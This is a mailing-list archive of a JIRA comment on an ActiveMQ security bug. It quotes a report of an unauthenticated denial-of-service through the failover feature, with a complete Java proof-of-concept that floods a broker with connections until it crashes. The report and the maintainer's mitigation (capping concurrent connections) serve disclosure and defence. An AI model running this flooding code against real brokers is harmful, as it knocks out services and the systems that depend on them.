activemq-dev mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Gary Tully (JIRA)" <j...@apache.org>
Subject [jira] [Commented] (AMQ-3294) ActiveMQ failover Denial of Service
Date Wed, 31 Aug 2011 16:51:09 GMT

    [ https://issues.apache.org/jira/browse/AMQ-3294?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13094680#comment-13094680
] 

Gary Tully commented on AMQ-3294:
---------------------------------

https://issues.apache.org/jira/browse/AMQ-1928 helps here, it allows you to limit the number
of concurrent connections. Set this to 10 and the DoS attack will fail

> ActiveMQ failover Denial of Service
> -----------------------------------
>
>                 Key: AMQ-3294
>                 URL: https://issues.apache.org/jira/browse/AMQ-3294
>             Project: ActiveMQ
>          Issue Type: Bug
>          Components: Broker
>    Affects Versions: 5.2.0, 5.5.0
>         Environment: Linux ubuntu 2.6.32-30-generic and other Linux versions
>            Reporter: Luca Carettoni
>              Labels: security
>
> Abusing the 'failover' feature in ActiveMQ, an unauthenticated user can trigger a Denial
of Service condition against the broker service. 
> In detail, an attacker can issue multiple ActiveMQ openwire connection requests using
the following connection string: 
failover:tcp://<IP>:61616
> Due to the 'failure' mechanism, all TCP connections remain active even if a valid session
is not created. 
> Please note that no valid credentials have been used. 
> After a few thousand requests, a "java.net.SocketException: Too many open files" exception
is triggered causing the freeze/crash of the broker. Connected systems may crash as well.

> During my test, the attack took around 4 minutes (in a local network) and it is highly
reliable. This is most likely an abuse of the 'failover' functionality.
> I've been testing version 5.2.0 and also the latest 5.5.0 release. As both releases are
affected, I assume that this issue is present in other versions as well. The problem appears
in the default configuration as well as with different authentication plugins enabled.
> Proof-Of-Concept:
> --------------------
> package openwireclient;
> import javax.jms.*;
> import org.apache.activemq.ActiveMQConnectionFactory;
> public class GoAndCrash {
>     private static String url = "failover:tcp://";
>     public static void main(String[] args) throws JMSException {
>         System.out.println("\n--[ ActiveMQ Denial of Service PoC ]\n");
>         url = url.concat(args[0] + ":" + args[1]);
>         int cont = 0;
>         while (true) {
>             try {
>                 System.out.println("[*] Request #" + cont);
>                 ConnectionFactory connectionFactory = new ActiveMQConnectionFactory("invalidUser",
"invalidPass", url);
>                 Connection connection = connectionFactory.createConnection();
>                 cont++;
>                 connection.start();
>             } catch (Exception ex) {
>                //do nothing
>             }
>         }
>     }
> }
> --------------------

--
This message is automatically generated by JIRA.
For more information on JIRA, see: http://www.atlassian.com/software/jira

       

Mime
View raw message